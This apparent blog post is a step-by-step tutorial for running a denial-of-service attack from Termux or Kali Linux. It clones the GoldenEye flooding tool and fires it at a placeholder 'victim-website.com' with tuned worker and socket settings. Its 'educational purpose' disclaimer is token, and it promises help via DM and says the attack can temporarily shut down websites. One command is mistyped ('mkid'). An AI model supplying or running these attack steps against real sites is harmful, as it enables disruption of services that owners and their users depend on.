Hello Guys in this blog i can explain How to do DDos in termux.

You can use this method on both Kali Linux and Termux.

If you don't have kali Linux, you can do it on your android phone you only need one app called Termux.

What is DDoS ?
DDos is stand for Distributed Denial of Service, This is attack for server or website on Internet, Hackers use this attack for Down the any websites. Its a very powerfull Attack on Internet.

But Before we can start this tutorial, we are post this only for educational perpose only. We are not responsible, If you use this attack for any illegal way.

Note : Don't attack DDoS on any goverment sites.


How To do DDoS in termux and Kali Linux
Step 1:

Open your Termux or Kali Linux
Type Following Command to create an Directory.

$ mkid ddos

$ cd ddos

Step 2:

Skip this Step if you are using Kali Linux.
But In Termux you need to install python2 and git package first.
$ pkg install python2

$ pkg install git

Step 3:

Now go to Github and clone GoldenEye source code.
it will download all source code on your device for do DDos Attack.
$ git clone https://github.com/jseidl/GoldenEye.git

Step 4:

It will create a new Directory so lets open this by follow this command.
$ cd GoldenEye/

Step 5:

Now its time to do DDos attack on victim website
Type following command to do DDOS using defult parameters
#for Kali Linux

./goldeneye.py victim-website.com

Step 6:

Skip this Step 6 if you are using Kali linux.
But in termux Type this command for do DDOS attack.
$ python2 ./goldeneye.py victim-website.com

Step 7:

Do with arguments
Add values for workers (-w), sockets(-s), and method (-m)
$ ./goldeneye.py victim-website.com -w 100 -s 70 -m post

Step 8:

If you don't stop attack it will blast server in some case.
To stop the attack simply press CTRL+C
If the attack didn't work or any error just DM me.
Temporary Shut Down the website
Check if a website handle DDOS attack.
Don't try to shut down Google, Yahoo, Facebook, Twitter and Medium it won't work
Don't forget to spread the world.
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